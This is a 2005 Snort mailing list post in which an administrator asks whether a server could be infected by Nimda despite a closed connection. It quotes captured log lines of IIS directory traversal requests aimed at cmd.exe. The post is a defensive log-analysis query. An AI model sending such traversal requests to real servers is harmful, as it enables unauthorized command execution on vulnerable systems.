Snort mailing list archives
Nimda Question
From: patrick.patenaude () bell ca
Date: Tue, 25 Jan 2005 11:41:16 -0500
I am a little confused over a couple of log results I have picked up. One has a connection closed and the other not. I know this is NIMDA; can someone confirm that even if the connection got closed it is possible that the server got infected? I do not have access to the server, so I cannot look into it right now.

Here are the logs:

This is one server, several attempts:

GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dr r HTTP/1.0..Host: www..Connnection: close....

GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe ?/c+dir 32/cmd.exe?/c+dir HTTP/1.0..Host: www..Connnection: close....

GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0..Host: www..Connnection: close....

Here is the other server:

GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir..ir..